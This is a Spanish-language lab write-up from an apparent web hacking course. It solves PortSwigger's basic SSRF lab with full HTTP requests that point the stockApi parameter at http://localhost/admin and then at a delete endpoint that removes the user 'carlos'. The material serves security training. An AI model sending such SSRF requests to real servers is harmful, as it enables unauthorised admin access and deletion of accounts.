😎
WEB
YouTubeTwitterLinkedIn
  • La Biblia del Hacking en Web
    • ADVERTENCIA
    • Conoce a tu academia
    • Conoce a tu instructor
    • Aprende Hacking Web con los laboratorios de PortSwigger
  • SQL Injection
    • ¿SQL Injection?
    • Lab 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
    • Lab 2: SQL injection vulnerability allowing login bypass
    • Lab 3: SQL injection attack, querying the database type and version on Oracle
    • Lab 4: SQL injection attack, querying the database type and version on MySQL and Microsoft
    • Lab 5: SQL injection attack, listing the database contents on non-Oracle databases
    • Lab 6: SQL injection attack, listing the database contents on Oracle
  • Cross Site Scripting
    • ¿XSS?
    • Lab 1: Reflected XSS into HTML context with nothing encoded
    • Lab 2: Stored XSS into HTML context with nothing encoded
    • Lab 3: DOM XSS in document.write sink using source location.search
    • Lab 4: DOM XSS in innerHTML sink using source location.search
    • Lab 5: DOM XSS in jQuery anchor href attribute sink using location.search source
  • ClickJacking
    • ¿Clickjacking?
    • Lab 1: Basic clickjacking with CSRF token protection
  • Access control vulnerabilities
    • ¿Control de Acceso?
    • Lab 1: Unprotected admin functionality
    • Lab 3: User role controlled by request parameter
  • Path traversal
    • ¿Path Traversal?
    • Lab 1: File path traversal, simple case
    • Lab 2: File path traversal, traversal sequences blocked with absolute path bypass
    • Lab 3: File path traversal, traversal sequences stripped non-recursively
  • XML external entity (XXE) injection
    • ¿XML external entity?
    • Lab 1: Exploiting XXE using external entities to retrieve files
    • Lab 2: Exploiting XXE to perform SSRF attacks
    • Lab 3: Blind XXE with out-of-band interaction
  • JWT
    • ¿JWT?
    • Lab 1: JWT authentication bypass via unverified signature
    • Lab 2: JWT authentication bypass via flawed signature verification
    • Lab 3: JWT authentication bypass via weak signing key
    • Lab 4: JWT authentication bypass via jwk header injection
    • Lab 5: JWT authentication bypass via jku header injection
  • Server-side request forgery (SSRF)
    • ¿SSRF?
    • Lab 1: Basic SSRF against the local server
  • OS command injection
    • ¿OS Command Injection?
    • Lab 1: OS command injection, simple case
  • Authentication
    • ¿Authentication?
    • Lab 1: Username enumeration via different responses
  • HTTP request smuggling
    • ¿HTTP request smuggling?
    • Lab 1: HTTP request smuggling, confirming a CL.TE vulnerability via differential responses
  • Server-side template injection
    • ¿Server-side template injection?
    • Lab 1: Basic server-side template injection
  • DOM-based vulnerabilities
    • Lab 1: DOM XSS using web messages
    • Lab 2: DOM XSS using web messages and a JavaScript URL
  • WebSockets
    • Lab #1: Manipulating WebSocket messages to exploit vulnerabilities
  • Prototype pollution
    • ¿Prototype Pollution?
    • Lab 1: Client-side prototype pollution via browser APIs
      • Utilizando DOM Invader
    • Lab 2: DOM XSS via client-side prototype pollution
    • Lab 3: DOM XSS via an alternative prototype pollution vector
      • Utilizando DOM Invader
    • Lab 4: Client-side prototype pollution via flawed sanitization
    • Lab 5: Client-side prototype pollution in third-party libraries
    • Lab 6: Privilege escalation via server-side prototype pollution
    • Lab 7: Detecting server-side prototype pollution without polluted property reflection
    • Lab 8: Bypassing flawed input filters for server-side prototype pollution
    • Lab 9: Remote code execution via server-side prototype pollution
    • Lab 10: Exfiltrating sensitive data via server-side prototype pollution
  • GraphQL
    • Lab 1: Accessing private GraphQL posts
  • Web cache poisoning
    • Lab 1: Web cache poisoning with an unkeyed header
  • CORS
    • Lab #2 - CORS vulnerability with trusted null origin
    • Lab 3: CORS vulnerability with trusted insecure protocols
  • API testing
    • Lab #1: Exploiting an API endpoint using documentation
    • Lab #2: Exploiting server-side parameter pollution in a query string
    • Lab #3: Finding and exploiting an unused API endpoint
    • Lab #4: Exploiting a mass assignment vulnerability
    • Lab #5: Exploiting server-side parameter pollution in a REST URL
Con tecnología de GitBook
En esta página

¿Te fue útil?

  1. Server-side request forgery (SSRF)

Lab 1: Basic SSRF against the local server

Anterior¿SSRF?Siguiente¿OS Command Injection?

Última actualización hace 1 año

¿Te fue útil?

Al acceder a un producto, se procede a darle clic a CHECK STOCK:

Lo anterior genera la siguiente peticion:

POST /product/stock HTTP/2
Host: 0a3d000e04bc735185976db6006f0010.web-security-academy.net
Cookie: session=sJJg6IkReCjOdJE83MuyEfgw9UKSo744
Content-Length: 108
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Content-Type: application/x-www-form-urlencoded
Accept-Language: es-CO
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a3d000e04bc735185976db6006f0010.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a3d000e04bc735185976db6006f0010.web-security-academy.net/product?productId=14
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D14%26storeId%3D1

Y responde asi:

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 3

872

Intentamos realizar un ataque de SSRF reemplazando el valor de stockApi:

POST /product/stock HTTP/2
Host: 0a3d000e04bc735185976db6006f0010.web-security-academy.net
Cookie: session=sJJg6IkReCjOdJE83MuyEfgw9UKSo744
Content-Length: 31
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Content-Type: application/x-www-form-urlencoded
Accept-Language: es-CO
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a3d000e04bc735185976db6006f0010.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a3d000e04bc735185976db6006f0010.web-security-academy.net/product?productId=14
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

stockApi=http://localhost/admin

Y lo anterior da como respuesta:

La respuesta previa indica que el aplicativo web si es vulnerable a SSRF y podriamos por ejemplo intentar eliminar un usuario asi:

POST /product/stock HTTP/2
Host: 0a3d000e04bc735185976db6006f0010.web-security-academy.net
Cookie: session=sJJg6IkReCjOdJE83MuyEfgw9UKSo744
Content-Length: 54
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Content-Type: application/x-www-form-urlencoded
Accept-Language: es-CO
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a3d000e04bc735185976db6006f0010.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a3d000e04bc735185976db6006f0010.web-security-academy.net/product?productId=14
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

stockApi=http://localhost/admin/delete?username=carlos

Al revisar la respuesta tendremos lo siguiente:

HTTP/2 302 Found
Location: /admin
Set-Cookie: session=mWs0sJitRQeWTssrE0TM9i0tRpFMRWEi; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 0

Y si consumimos nuevamente la siguiente peticion:

POST /product/stock HTTP/2
Host: 0a3d000e04bc735185976db6006f0010.web-security-academy.net
Cookie: session=sJJg6IkReCjOdJE83MuyEfgw9UKSo744
Content-Length: 31
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Content-Type: application/x-www-form-urlencoded
Accept-Language: es-CO
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a3d000e04bc735185976db6006f0010.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a3d000e04bc735185976db6006f0010.web-security-academy.net/product?productId=14
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

stockApi=http://localhost/admin

Se lograra apreciar que se elimino el usuario: